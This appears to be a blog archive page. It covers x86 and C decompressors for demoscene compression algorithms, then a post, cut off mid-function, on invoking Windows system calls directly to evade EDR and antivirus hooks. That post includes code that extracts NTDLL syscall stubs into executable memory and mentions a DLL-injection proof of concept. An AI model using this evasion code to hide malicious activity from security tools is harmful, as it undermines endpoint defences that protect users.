        ; p = out - dist
        push   esi
        mov    esi, edi
        sub    esi, edx
        ; while(len--) *out++ = *p++;
        rep    movsb
        pop    esi
        jmp    ulz_main
        ; }
    ulz_exit:
        ; return (uint32_t)(out - (uint8_t*)outbuf);
        sub    edi, [esp+32+8]
        mov    [esp+28], edi
        popad
        ret
        
    ; static uint32_t add_mod(uint32_t x, uint8_t** p);
    add_mod:
        push   eax               ; save eax
        xchg   eax, ecx          ; eax = len
        xor    ecx, ecx          ; i = 0
    am_loop:
        mov    dl, byte[esi]     ; c = *(*p)++
        inc    esi
        push   edx               ; save c
        shl    edx, cl           ; x += (c << i)
        add    eax, edx
        pop    edx               ; restore c
        cmp    dl, 128           ; if(c < 128) break;
        jb     am_exit
        add    cl, 7             ; i+=7
        cmp    cl, 21            ; i<=21
        jbe    am_loop
    am_exit:
        xchg   eax, ecx          ; ecx = len
        pop    eax               ; restore eax
        ret
    

    12.3 BriefLZ

    Designed by Jørgen Ibsen and published in 2015. BriefLZ combines fast encoding and decoding with a good compression ratio. Ibsen uses 16-Bit tags instead of 8-Bit to improve performance on 16-bit architectures. It encodes the match reference length and offset using Elias gamma coding. The following size-optimized decoder in x86 assembly is only 92 bytes.

    blz_depack:
    _blz_depack:
        pushad
        lea    esi, [esp+32+4]   ; 
        lodsd
        xchg   edi, eax          ; bs.dst = outbuf
        lodsd
        lea    ebx, [edi+eax]    ; end = bs.dst + outlen
        lodsd
        xchg   esi, eax          ; bs.src = inbuf
        call   blz_init_getbit
    blz_getbit:
        add    ax, ax            ; tag <<= 1 
        jnz    blz_exit_getbit   ; continue for all bits
        lodsw                    ; read 16-bit tag
        adc    ax, ax            ; carry over previous bit
    blz_exit_getbit:
        ret
    blz_init_getbit:
        pop    ebp               ; ebp = blz_getbit
        mov    ax, 8000h         ; 
    blz_literal:
        movsb                    ; *out++ = *bs.src++
    blz_main:
        cmp    edi, ebx          ; while(out < end)
        jnb    blz_exit
        
        call   ebp               ; cf = blz_getbit
        jnc    blz_literal       ; if(cf==0) goto blz_literal
                                 ; 
    blz_getgamma:
        pushfd                   ; save cf
        cdq                      ; result = 1
        inc    edx
    blz_gamma_loop:
        call   ebp               ; cf = blz_getbit()
        adc    edx, edx          ; result = (result << 1) + cf
        call   ebp               ; cf = blz_getbit()
        jc     blz_gamma_loop    ; while(cf == 1)
        
        popfd                    ; restore cf
        cmovc  ecx, edx          ; ecx = cf ? edx : ecx
        cmc                      ; complement carry
        jnc    blz_getgamma      ; loop twice
        
        ; ofs = blz_getgamma(&bs) - 2;
        dec    edx
        dec    edx
        
        ; len = blz_getgamma(&bs) + 2;
        inc    ecx
        inc    ecx
        
        ; ofs = (ofs << 8) + (uint32_t)*bs.src++ + 1;
        shl    edx, 8
        mov    dl, [esi]
        inc    esi
        inc    edx
        
        ; ptr = out - ofs;
        push   esi
        mov    esi, edi
        sub    esi, edx
        rep    movsb
        pop    esi
        jmp    blz_main
    blz_exit:
        ; return (out - (uint8_t*)outbuf);
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
    

    12.4 Not Really Vanished (NRV)

    Designed by Markus F.X.J. Oberhumer and used in the famous Ultimate Packer for eXecutables (UPX). NRV uses an LZ77 format with Elias gamma coding for the reference match offset and length. The following x86 assembly derived from n2b_d_s1.asm in the UCL library is currently 115 bytes.

    nrv2b_depack:
    _nrv2b_depack:
        pushad
        mov    edi, [esp+32+4]   ; output
        mov    esi, [esp+32+8]   ; input
        
        xor    ecx, ecx
        mul    ecx
        dec    edx
        mov    al, 0x80
        
        call   init_get_bit
        ; read next bit from input
        add    al, al
        jnz    exit_get_bit
        
        lodsb
        adc    al, al
    exit_get_bit:             
        ret
    init_get_bit:
        pop    ebp
        jmp    nrv2b_main
        ; copy literal
    nrv2b_copy_byte:
        movsb
    nrv2b_main:
        call   ebp
        jc     nrv2b_copy_byte
        
        push   1
        pop    ebx
    nrv2b_match:
        call   ebp
        adc    ebx, ebx
        
        call   ebp
        jnc    nrv2b_match
        
        sub    ebx, 3
        jb     nrv2b_offset
        
        shl    ebx, 8
        mov    bl, [esi]
        inc    esi
        xor    ebx, -1
        jz     nrv2b_exit
        
        xchg   edx, ebx
    nrv2b_offset:
        call   ebp
        adc    ecx, ecx
        
        call   ebp
        adc    ecx, ecx
        jnz    nrv2b_copy_bytes
        
        inc    ecx
    nrv2b_len:
        call   ebp
        adc    ecx, ecx
        
        call   ebp
        jnc    nrv2b_len
        
        inc    ecx
        inc    ecx
    nrv2b_copy_bytes:
        cmp    edx, -0xD00
        adc    ecx, 1
        push   esi
        lea    esi, [edi + edx]
        rep    movsb
        pop    esi
        jmp    nrv2b_main
    nrv2b_exit:
        ; return depacked length
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
    

    12.5 Lempel-Ziv-Markov chain Algorithm (LZMA)

    Designed by Igor Pavlov and published in 1998 with the 7zip archiver. It’s an LZ77 variant with features similar to LZX used for Microsoft CAB files and compressed help (CHM) files. LZMA uses an arithmetic coder to store compressed data as a stream of bits resulting in high compression ratios that inspired the development of Packfire, KKrunchy, and LZOMA, to name a few. There’s a description by Charles Bloom in De-obfuscating LZMA and by Matt Mahoney in Data Compression Explained. Alex Ionescu has also published a minimal implementation with very detailed and helpful comments included in the source. Another size-optimized version is available from the UPX LZMA SDK. The arithmetic coder for LZMA usually requires 16KB of RAM and may not be suitable for devices with limited resources. mudlord’s Win32 executable packer called mupack has an x86 implementation.

    Although the compression ratio is excellent, and the speed is acceptable for small files. The complexity of the decompressor for only a few additional percents more in the compression ratio didn’t merit an implementation in x86 assembly. I’d be willing to implement it on a better architecture like ARM64, but not x86. Shrinkler, KKrunchy, and LZOMA all offer ~55% ratios with much smaller RAM and ROM requirements that seem more suitable for executable compression.

    12.6 Lempel–Ziv–Oberhumer-Markov Algorithm (LZOMA)

    Designed by Alexandr Efimov and published in 2015. LZOMA is specifically for decompression of the Linux Kernel but is also suitable for decompression of PE or ELF files too. It’s primarily based on ideas used by LZMA and LZO. It provides fast decompression like LZO, and a simplified LZMA format provides a high compression ratio. The trade-off is slow compression requiring a lot of memory. It’s possible to improve the compression ratio by using a real entropy encoder, but at the expense of decompression speed. While it’s still only an experimental algorithm and probably needs more testing, the following is a decoder in C and handwritten x86 assembly.

    typedef struct _lzoma_ctx {
        uint32_t w;
        uint8_t  *src;
    } lzoma_ctx;
    
    static uint8_t get_bit(lzoma_ctx *c) {
        uint32_t cy, x;
        
        x = c->w;
        c->w <<= 1;
    
        // no bits left?
        if(c->w == 0) {
          // read 32-bit word
          x = *(uint32_t*)c->src;
          // advance input
          c->src += 4;
          // double with carry
          c->w = (x << 1) | 1;
        }
        // return carry bit
        return (x >> 31);
    }
     
    void lzoma_depack(
      void *outbuf, 
      uint32_t inlen, 
      const void *inbuf) 
    {
        uint8_t   *out, *ptr, *end;
        uint32_t  cf, top, total, len, ofs, x, res;
        lzoma_ctx c;
    
        c.w    = 1 << 31;
        c.src  = (uint8_t*)inbuf;
        out    = (uint8_t*)outbuf;
        end    = out + inlen;
        
        // copy first byte
        *out++ = *c.src++;
        len    = 0;
        ofs    = -1;
    
        while(out < end) {
          for(;;) {
            // if bit carried, break
            if(cf = get_bit(&c)) break;
            // copy byte
            *out++ = *c.src++;
            len = 2;
          }
          // unpack lz
          if(len) {
            cf = get_bit(&c);
          }
          // carry?
          if(cf) {
            len   = 3;
            total = out - (uint8_t*)outbuf;        
            top   = ((total <= 400000) ? 60 : 50); 
            ofs   = 0;                             
            x     = 256;                           
            res   = *c.src++;                      
            
            for(;;) {
              x += x;
              if(x >= (total + top)) {
                x -= total;
                if(res >= x) { 
                  cf = get_bit(&c);
                  res = (res << 1) + cf;
                  res -= x;
                }
                break;
              }      
              // magic?
              if(x & (0x002FFE00 << 1)) {
                top = (((top << 3) + top) >> 3);
              }
              if(res < top) break;
              
              ofs -= top;
              total += top;
              top <<= 1;
              cf = get_bit(&c);
              res = (res << 1) + cf;
            }
            ofs += res + 1;
            // long length?
            if(ofs >= 5400) len++;
            // huge length?
            if(ofs >= 0x060000) len++;
            // negate
            ofs =- ofs;
          }
          
          if(get_bit(&c)) {
            len += 2;
            res = 0;
            for(;;) { 
              cf = get_bit(&c);
              res = (res << 1) + cf;
              if(!get_bit(&c)) break;
              res++;
            }
            len += res;
          } else {
            cf = get_bit(&c); 
            len += cf;
          }
          ptr = out + ofs;
          while(--len) *out++ = *ptr++;
        }
    }
    

    The assembly code doesn’t transfer that well on to x86. It does, however, avoid having to use lots of RAM, which is a plus.

    lzoma_depack:
    _lzoma_depack:
        pushad                   ; save all registers
        lea    esi, [esp+32+4]
        lodsd
        xchg   edi, eax          ; edi = outbuf
        lodsd
        xchg   ebp, eax          ; ebp = inlen
        add    ebp, edi          ; ebp += out
        lodsd
        xchg   esi, eax          ; esi = inbuf
        pushad                   ; save esi, edi and ebp
        call   init_getbit
    get_bit:
        add    eax, eax          ; c->w <<= 1
        jnz    exit_getbit       ; if(c->w == 0)
        lodsd                    ; x = *(uint32_t*)c->src;
        adc    eax, eax          ; c->w = (x << 1) | 1;
    exit_getbit:
        ret                      ; return x >> 31;
    init_getbit:
        pop    ebp               ; ebp = &get_bit
        mov    eax, 1 << 31      ; c->w = 1 << 31
        cdq                      ; ofs = -1
        movsb                    ; *out++ = *src++;
        xor    ecx, ecx          ; len = 0
        jmp    main_loop
    copy_byte:
        movsb                    ; *out++ = *c.src++;
        mov    cl, 2             ; len = 2
    main_loop:
        xor    ebx, ebx          ; res = 0
        
        ; while(out < end)
        cmp    edi, [esp+pushad_t._ebp]
        jnb    lzoma_exit
        
        ; for(;;) {
        call   ebp               ; cf = get_bit(&c);
        jnc    copy_byte         ; if(cf) break;
        
        ; unpack lz
        jecxz  skip_lz           ; if(len) {
        call   ebp               ;   cf = get_bit(&c);
    skip_lz:                     ; }
        ; carry?
        jnc    use_last_offset   ; if(cf) {
        mov    cl, 3+2           ;   len = 3
        pushad                   ;   
        ; total = out - (uint8_t*)outbuf
        sub    edi, [esp+32+pushad_t._edi] 
        ; top = ((total <= 400000) ? 60 : 50;
        mov    cl, 50
        cmp    edi, 400000
        ja     skip_upd
        add    cl, 10
    skip_upd:
        xor    ebp, ebp          ; ofs = 0
        xor    edx, edx          ; x = 256
        inc    dh
        mov    bl, byte[esi]     ; res = *c.src++
        inc    esi
    find_loop:                   ; for(;;) {
        add    edx, edx          ;   x += x;
        ; if(x >= (total + top)) {
        push   edi               ; save total
        add    edi, ecx          ; edi = total + top
        cmp    edx, edi          ; cf = (x - (total + top)) 
        pop    edi               ; restore total
        jb     upd_len3          ; jump if x is < (total + top)
        
        sub    edx, edi          ; x -= total;
        cmp    ebx, edx          ; if(res >= x) {
        jb     upd_len2          ; jump if res < x
        
        ; cf = get_bit(&c);
        call   dword[esp+pushad_t._ebp]
        adc    ebx, ebx          ; res = (res << 1) + cf;
        sub    ebx, edx          ; res -= x;
        jmp    upd_len2
    upd_len3:
        ; magic?
        ; if(x & (0x002FFE00 << 1)) {
        test   edx, (0x002FFE00 << 1)
        jz     upd_len4
        
        ; top = (((top << 3) + top) >> 3);
        lea    ecx, [ecx+ecx*8]
        shr    ecx, 3
    upd_len4:
        cmp    ebx, ecx          ; if(res < top) break;
        jb     upd_len2
        
        sub    ebp, ecx          ; ofs -= top
        add    edi, ecx          ; total += top
        add    ecx, ecx          ; top <<= 1
        
        ; cf = get_bit(&c);
        call   dword[esp+pushad_t._ebp]
        
        ; res = (res << 1) + cf;
        adc    ebx, ebx
        jmp    find_loop
    upd_len2:
        ; ofs = (ofs + res + 1);
        lea    ebp, [ebp + ebx + 1]
    
        ; if(ofs >= 5400) len++;
        cmp    ebp, 5400
        sbb    dword[esp+pushad_t._ecx], 0
        
        ; if(ofs >= 0x060000) len++;
        cmp    ebp, 0x060000
        sbb    dword[esp+pushad_t._ecx], 0
        
        neg    ebp               ; ofs = -ofs;
        
        mov    [esp+pushad_t._edx], ebp ; save ofs in edx
        mov    [esp+pushad_t._esi], esi
        mov    [esp+pushad_t._eax], eax
        popad                    ; restore registers
    use_last_offset:
        call   ebp               ; if(get_bit(&c)) {
        jnc    check_two
        
        add    ecx, 2            ; len += 2
    upd_len:                     ; for(res=0;;res++) {
        call   ebp               ; cf = get_bit(&c);
        adc    ebx, ebx          ; res = (res << 1) + cf;
        
        call   ebp               ; if(!get_bit(&c)) break;
        jnc    upd_lenx
        
        inc    ebx               ; res++;
        jmp    upd_len
    upd_lenx:
        add    ecx, ebx          ; len += res
        jmp    copy_bytes
    check_two:                   ; } else {
        call   ebp               ;   cf = get_bit();
        adc    ecx, ebx          ;   len += cf
    copy_bytes:                  ; }
        push   esi               ; save c.src pointer
        lea    esi, [edi + edx]  ; ptr = out + ofs
        dec    ecx
        ; while(--len) *out++ = *ptr++;
        rep    movsb
        pop    esi               ; restore c.src
        jmp    main_loop
    lzoma_exit:
        popad                    ; free()
        popad                    ; restore registers
        ret
    

    12.7 KKrunchy

    Designed by Fabian Giesen for the demo group, Farbrausch, KKrunchy comprises two algorithms. The first, developed between 2003 and 2005, is an LZ77 variant with an arithmetic coder published in 2006. The second algorithm developed between 2006 and 2008, borrows ideas from PAQ7 and was published in 2011. Both are slow at compression but acceptable for demo productions and are compact for decompression. Fabian describes both in more detail here, including the “secret ingredient” that can improve ratios of 64K intros by up to 10%. In 2011, Farbrausch members published source code for their demo productions made between 2001-2011, including both compressors. A 32-Bit x86 decoder is already available from Fabian. There appears to be a buffer overflow in the compressor that goes unnoticed without address sanitizer. Here’s an alternate version of the simple depacker used as a reference.

    #ifdef linux
    // gcc
    #define REV(x) __builtin_bswap32(x)
    #else
    // msvc
    #define REV(x) _byteswap_ulong(x)
    #endif
    
    typedef struct _fr_state {
        const uint8_t *src;
        // range decoder values
        uint32_t val, len, pbs[803];
    } fr_state;
    
    // decode a bit using range decoder
    static int DB(
      fr_state *s, int idx, uint32_t flag) 
    {
        uint32_t a, b, c, d, e;
    
        a = s->pbs[idx];
        b = (s->len >> 11) * a;
        c = (s->val >= b);
        d = -c; e = c-1;
        s->len = (d & s->len) | (e & b);
        a = (d & a) | (e & -a + 2048);
        a >>= (5 - flag);
        s->pbs[idx] += (a ^ d) + c;
        d &= b;
        s->val -= d; s->len -= d;
        a = (s->len >> 24);
        a = a == 0 ? -1 : 0;
        b = (a & 0xFF) & *s->src;
        d = -a;
        s->src += d;
        s->val = (s->val << (d << 3)) | b;
        s->len = (s->len << (d << 3));
        return c;
    }
    
    // decode tree
    static int DT(
      fr_state *s, int p, int bits) 
    {
        int c;
        
        for(c=1; c<bits;) {
          c = (c+c) + DB(s, p + c, bits==256);
        }
        return c - bits;
    }
    
    // decode gamma
    static int DG(fr_state *s, int flag) {
        int     v, x = 1;
        uint8_t c = 1;
        
        v = (-flag & (547 - 291)) + 291;
        
        do {
          c = (c+c) + DB(s, v+c, 0);
          x = (x+x) + DB(s, v+c, 0);
          c = (c+c) + (x & 1);
        } while(c & 2);
        
        return x;
    }
    
    uint32_t fr_depack(
      void *outbuf, 
      const void *inbuf) 
    {
        int      tmp, i, ofs, len, LWM;
        uint8_t  *ptr, *out = (uint8_t*)outbuf;
        fr_state s;
         
        s.src  = (const uint8_t*)inbuf;
        s.len  = ~0;
        s.val  = REV(*(uint32_t*)s.src);
        s.src += 4;
        
        for(i=0; i<803; i++) s.pbs[i] = 1024;
    
        for(;;) {
          LWM = 0;
          // decode literal
          *out++ = DT(&s, 35, 256);
        fr_read_bit:
          if(!DB(&s, LWM, 0)) continue;
          // decode match
          len = 0;
          // use previous offset?
          if(LWM || !DB(&s, 2, 0)) {
            ofs = DG(&s, 0);
            if(!ofs) break;
            
            len  = 2;
            ofs  = ((ofs - 2) << 4); 
            tmp  = ((ofs != 0 ? -1 : 0) & 16) + 3;
            ofs += DT(&s, tmp, 16) + 1;
            
            len -= (ofs < 2048);
            len -= (ofs < 96);
          }
          LWM  = 1;
          len += DG(&s, 1);
          ptr  = out - ofs;
          
          while(len--) *out++ = *ptr++;
          goto fr_read_bit;
        }
        return out - (uint8_t*)outbuf;
    }
    

    13. Results

    The following table, while ordered by ratio, is NOT a rank order and shouldn’t be interpreted that way. It wouldn’t be fair to judge the algorithms based on my criteria, that is: lightweight decompressor, high compression ratio, open source. The ratios are based on compressing a 1MB PE file for Windows without any additional trickery.

    Algorithm RAM (Bytes) ROM (Bytes) Ratio
    LZ77 0 54 32%
    ZX7 Mini 0 67 36%
    LZSS 0 69 40%
    LZ4 0 80 43%
    ULZ 0 124 44%
    LZE 0 97 45%
    ZX7 0 81 46%
    MegaLZ 0 117 46%
    BriefLZ 0 92 46%
    LZSA1 0 96 46%
    LZSA2 0 187 50%
    NRV2b 0 115 51%
    LZOMA 0 238 54%
    Shrinkler 4096 235 55%
    KKrunchy 3212 639 (compiler generated) 55%
    LZMA 16384 1265 (compiler generated) 58%

    14. Summary

    One could surely write a book about compression algorithms used by the Demoscene. And it’s safe to say I’ve only scraped the surface on this subject. For example, there is no analysis of compression and decompression speed of implementations for the x86 or other architectures. My primary concern at the moment is in the compression ratio and code size.

    15. Acknowledgements

    A number of people helped directly or indirectly with this post.

    • Tim Bell for LZB and information about the Stac Electronics lawsuit.
    • Blueberry for optimization tips and fixing my initial 68K translation of Shrinkler.
    • Qkumba for fixing x86 translation, translation of Exomizer and 6502 depackers.
    • Trixter for 8088 depackers.
    • Introspec for Z80 depackers and impressive knowledge of LZ variations.
    • Emmanuel Marty for aPUltra, LZSA, and helping with x86 decoder for aPLib.

    16. Further Research

    To save you time locating information about some of the topics discussed in this post, I’ve included some links to get you started.

    16.1 Documentaries and Interviews

    16.2 Websites, Blogs and Forums

    16.3 Demoscene Productions

    This is not a “best of” list or what my favorites are. It’s mainly from some youtube recommendations and please don’t take offense If I didn’t include your demo. Contact me if you feel I’ve missed any.

    16.4 Tools

    16.5 Other Compression Algorithms

    The following table, while ordered by ratio, is NOT a rank order and shouldn’t be interpreted that way. It wouldn’t be fair to judge the algorithms based on my criteria, which is a lightweight decompressor, high compression ratio, open-source. The compression ratios are from compressing a 1MB PE file for Windows.

    OK/Good (~25-39%)

    Library / API / Algorithm Ratio Link
    zpack 24% https://github.com/zerkman/zpacker
    PPP 27% https://tools.ietf.org/html/rfc1978
    JQCoding 27% https://encode.su/threads/2157-Looking-for-a-super-simple-decompressor?p=43099&viewfull=1#post43099
    LZJB 28% https://github.com/nemequ/lzjb
    LZRW1 31% http://ross.net/compression/lzrw1.html
    LZ48 31% http://www.cpcwiki.eu/forum/programming/lz48-cruncherdecruncher/
    LZ77 32% https://github.com/andyherbert/lz1
    LZW 33% https://github.com/vapier/ncompress
    LZP1 34% http://www.hugi.scene.org/online/coding/hugi%2012%20-%20colzp.htm
    Kitty 34% https://encode.su/threads/2174-Kitty-file-compressor-(Super-small-compressor)
    LZ49 35% http://www.cpcwiki.eu/forum/programming/lz48-cruncherdecruncher/
    LZ4X 36% https://github.com/encode84/lz4x
    QuickLZ 36% http://www.quicklz.com/
    ZX7mini 36% https://github.com/antoniovillena/zx7mini
    RtlDecompressBuffer (LZNT1) 36% Windows OS
    Decompress (Xpress) 37% Windows OS.

    Very Good (40-49%)

    Library / API / Algorithm Ratio Link
    LZSS 40% https://github.com/kieselsteini/lzss
    LZF 40% https://encode.su/threads/1819-LZF-Optimized-LZF-compressor
    LZM 41% https://github.com/r-lyeh/stdarc.c
    RtlDecompressBuffer (Xpress) 43% Windows OS
    BLZ4 43% https://github.com/jibsen/blz4
    LZ4Ultra 43% https://github.com/emmanuel-marty/lz4ultra
    ULZ 44% https://github.com/encode84/ulz
    BitBuster 44% https://www.teambomba.net/bombaman/downloadd26a.html
    LZE 45% http://gorry.haun.org/pw/?lze
    Decompress (Xpress Huffman) 45% Windows OS
    ZX7 45% http://www.worldofspectrum.org/infoseekid.cgi?id=0027996
    LZMAT 45% http://www.matcode.com/lzmat.htm
    CRUSH 45% https://sourceforge.net/projects/crush/
    Hrust 46% https://github.com/specke/ohc
    MegaLZ 46% http://os4depot.net/index.php?function=showfile&file=development/cross/megalz.lha
    LZSA1 46% https://github.com/emmanuel-marty/lzsa
    BriefLZ 46% https://github.com/jibsen/brieflz
    apUltra 47% https://github.com/emmanuel-marty/apultra
    Pletter5 47% http://www.xl2s.tk/
    Pucrunch 48% https://github.com/mist64/pucrunch
    SR2 48% http://mattmahoney.net/dc/#sr2

    Excellent (50% >)

    Library / API / Algorithm Ratio Link
    BCRUSH 50% https://github.com/jibsen/bcrush
    LZSA2 50% https://github.com/emmanuel-marty/lzsa
    RtlDecompressBufferEx (Xpress Huffman) 50% Windows OS
    Decompress (MSZip) 51% Windows OS
    Exomizer 51% https://bitbucket.org/magli143/exomizer/wiki/Home
    aPLib 51% http://ibsensoftware.com/products_aPLib.html
    JCALG1 52% https://bitsum.com/portfolio/jcalg1/
    NRV2B 52% http://www.oberhumer.com/opensource/ucl/
    BALZ 53% https://sourceforge.net/projects/balz/
    Decompress (LZMS) 54% Windows OS
    LZOMA 54% https://github.com/alef78/lzoma
    KKrunchy 55% https://github.com/farbrausch/fr_public
    Shrinkler 55% https://github.com/askeksa/Shrinkler
    NLZM 55% https://github.com/nauful/NLZM
    BCM 55% https://github.com/encode84/bcm
    D3DDecompressShaders (DXT/BC) 57% Windows OS
    Packfire 57% http://neural.untergrund.net/
    LZMA 58% https://www.7-zip.org/sdk.html
    PAQ8F 70% http://mattmahoney.net/dc/paq.html

    Invoking System Calls and Windows Debugger Engine

    By: odzhan
    1 June 2020 at 15:00

    Introduction

    Quick post about Windows System calls that I forgot about working on after the release of Dumpert by Cn33liz last year, which is described in this post. Typically, EDR and AV set hooks on Win32 API or NT wrapper functions to detect and mitigate against malicious activity. Dumpert attempts to bypass any user-level hooks by invoking system calls directly. It first queries the operating system version via RtlGetVersion and then selects the applicable code stubs to execute. SysWhispers generates header/ASM files by extracting the system call numbers from the code stubs in NTDLL.dll and evilsocket also demonstrated how to do this many years ago. @FuzzySec and @TheWover have also implemented dynamic invocation of system calls after remapping NTDLL in Sharpsploit, which you can read about in their Bluehat presentation.

    Using system calls on Windows to interact with the kernel has always been problematic because the numbers assigned for each kernel function change between the versions released. Just after Cn33liz published Dumpert, I thought of how invocation might be improved without using assembly and there are lots of ways, but consider at least three for now. The first method, which is probably the simplest and safest, maps NTDLL.dll into executable memory and resolves the address of any system call via the Export Address Table (EAT) before executing. This is relatively simple to implement. The second approach maps NTDLL.dll into read-only memory and uses a disassembler, or at the very least, a length disassembler to extract the system call number. The third will also map NTDLL.dll into read-only memory, copy the code stub to an executable buffer before invoking. The length of the stub is read from the exception directory. Overcomplicated, perhaps, and I did consider a few disassembly libraries for the second method, but just to save time settled with the Windows Debugger Engine, which has a built-in disassembler already.

    A PoC to inject a DLL into remote process can be found here. It doesn’t use a disassembler, but because it uses the exception directory to locate the end of a system call, it will only work with 64-bit processes.

    Windows Debugging Engine

    Disassembling code via the engine requires a live process. Thankfully it’s possible to attach the debugger to the local process in noninvasive mode. You can just map NTDLL into executable memory and invoke any system call from there, however, I wanted an excuse to use the debugging engine. 😛 lde.c, lde.h

    LDE::LDE() {
        CHAR path[MAX_PATH];
        
        ctrl = NULL;
        clnt = NULL;
        // create a debugging client
        hr = DebugCreate(__uuidof(IDebugClient), (void**)&clnt);
        if(hr == S_OK) {
          // get the control interface
          hr = clnt->QueryInterface(__uuidof(IDebugControl3), (void**)&ctrl);
          if(hr == S_OK) {
            // attach to existing process
            hr = clnt->AttachProcess(NULL, 
              GetProcessId(GetCurrentProcess()), 
              DEBUG_ATTACH_NONINVASIVE | DEBUG_ATTACH_NONINVASIVE_NO_SUSPEND);
            if(hr == S_OK) {
              hr = ctrl->WaitForEvent(DEBUG_WAIT_DEFAULT, INFINITE);
            }
          }
        }
        ExpandEnvironmentStrings("%SystemRoot%\\system32\\NTDLL.dll", path, MAX_PATH);
        // open file
        file = CreateFile(path, 
          GENERIC_READ, FILE_SHARE_READ, NULL, 
          OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
          
        if(file == INVALID_HANDLE_VALUE) return;
        
        // map file
        map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, NULL);
        if(map == NULL) return;
        
        // create read only view of map
        mem = (LPBYTE)MapViewOfFile(map, FILE_MAP_READ, 0, 0, NULL);
    }
    

    WinDbg has a command to disassemble a complete function called uf (Unassemble Function). Internally, WinDbg builds a Control-flow Graph (CFG) to map the full function before displaying the disassembly of each code block. You can execute a command like uf via the Execute method and so long as you’ve setup IDebugOutputCallbacks, you can capture the disassembly that way. I considered using a CFG to implement something similar to uf, which you can if you wish. The system calls on my own build of Windows 10 have at the most, one branch, so I scrapped the idea of using a CFG or executing uf. With NTDLL mapped, you can use something like the following to resolve the address of an exported API.

    FARPROC LDE::GetProcAddress(LPCSTR lpProcName) {
        PIMAGE_DATA_DIRECTORY   dir;
        PIMAGE_EXPORT_DIRECTORY exp;
        DWORD                   rva, ofs, cnt;
        PCHAR                   str;
        PDWORD                  adr, sym;
        PWORD                   ord;
        
        if(mem == NULL || lpProcName == NULL) return NULL;
        
        // get pointer to image directories for NTDLL
        dir = Dirs();
        
        // no exports? exit
        rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if(rva == 0) return NULL;
        
        ofs = rva2ofs(rva);
        if(ofs == -1) return NULL;
        
        // no exported symbols? exit
        exp = (PIMAGE_EXPORT_DIRECTORY)(ofs + mem);
        cnt = exp->NumberOfNames;
        if(cnt == 0) return NULL;
        
        // read the array containing address of api names
        ofs = rva2ofs(exp->AddressOfNames);        
        if(ofs == -1) return NULL;
        sym = (PDWORD)(ofs + mem);
    
        // read the array containing address of api
        ofs = rva2ofs(exp->AddressOfFunctions);        
        if(ofs == -1) return NULL;
        adr = (PDWORD)(ofs + mem);
        
        // read the array containing list of ordinals
        ofs = rva2ofs(exp->AddressOfNameOrdinals);
        if(ofs == -1) return NULL;
        ord = (PWORD)(ofs + mem);
        
        // scan symbol array for api string
        do {
          str = (PCHAR)(rva2ofs(sym[cnt - 1]) + mem);
          // found it?
          if(lstrcmp(str, lpProcName) == 0) {
            // return the address
            return (FARPROC)(rva2ofs(adr[ord[cnt - 1]]) + mem);
          }
        } while (--cnt);
        return NULL;
    }
    

    The following will use the Disassemble method to show the code. You can also use it to inspect bytes if you wanted to extract the system call number. The beginning and end of the system call is read from the Exception directory.

    bool LDE::DisassembleSyscall(LPCSTR lpSyscallName) {
        ULONG64                       ofs, start=0, end=0, addr;
        PIMAGE_DOS_HEADER             dos;
        PIMAGE_NT_HEADERS             nt;
        PIMAGE_DATA_DIRECTORY         dir;
        PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
        DWORD                         i, rva;
        CHAR                          buf[LDE_MAX_STR];
        HRESULT                       hr;
        ULONG                         len;
        
        // resolve address of function in NTDLL
        addr = (ULONG64)GetProcAddress(lpSyscallName);
        if(addr == NULL) return false;
        
        // get pointer to image directories
        dir = Dirs();
        
        // no exception directory? exit
        rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
        if(rva == 0) return false;
        
        ofs = rva2ofs(rva);
        if(ofs == -1) return false;
        
        rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);
    
        // for each runtime function (there might be a better way??)
        for(i=0; rf[i].BeginAddress != 0; i++) {
          // is it our system call?
          start = rva2ofs(rf[i].BeginAddress) + (ULONG64)mem;
          if(start == addr) {
            // save end and exit search
            end = rva2ofs(rf[i].EndAddress) + (ULONG64)mem;
            break;
          }
        }
        
        if(start != 0 && end != 0) {
          while(start < end) {
            hr = ctrl->Disassemble(
              start, 0, buf, LDE_MAX_STR, &len, &start);
              
            if(hr != S_OK) break;
            
            printf("%s", buf);
          }
        }
        return true;
    }
    

    The following code will disassemble the system call.

    int main(int argc, char *argv[]) {
        LDE *lde;
        
        if(argc != 2) {
          printf("usage: dis <system call name>\n");
          return 0;
        }
        
        // create length disassembly engine
        lde = new LDE();
          
        lde->DisassembleSyscall(argv[1]);
    
        delete lde;
        
        return 0;
    }
    

    Just to illustrate disassembly of NtCreateThreadEx and NtWriteVirtualMemory. The address of SharedUserData doesn’t change and therefore doesn’t require fixups to the code just because it’s been mapped somewhere else.

    Invoking

    Simply copy the code for the system call to memory allocated by VirtualAlloc with PAGE_EXECUTE_READWRITE permissions. Rewriting the above code, we have something like the following.

    LPVOID LDE::GetSyscallStub(LPCSTR lpSyscallName) {
        ULONG64                       ofs, start=0, end=0, addr;
        PIMAGE_DOS_HEADER             dos;
        PIMAGE_NT_HEADERS             nt;
        PIMAGE_DATA_DIRECTORY         dir;
        PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
        DWORD                         i, rva;
        SIZE_T                        len;
        LPVOID                        cs = NULL;
        
        // resolve address of function in NTDLL
        addr = (ULONG64)GetProcAddress(lpSyscallName);
        if(addr == NULL) return NULL;
        
        // get pointer to image directories
        dir = Dirs();
        
        // no exception directory? exit
        rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
        if(rva == 0) return NULL;
        
        ofs = rva2ofs(rva);
        if(ofs == -1) return NULL;
        
        rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);
    
        // for each runtime function (there might be a better way??)
        for(i=0; rf[i].BeginAddress != 0; i++) {
          // is it our system call?
          start = rva2ofs(rf[i].BeginAddress) + (ULONG64)mem;
          if(start == addr) {
            // save the end and calculate length
            end = rva2ofs(rf[i].EndAddress) + (ULONG64)mem;
            len = (SIZE_T) (end - start);
            
            // allocate RWX memory
            cs = VirtualAlloc(NULL, len,  MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if(cs != NULL) {
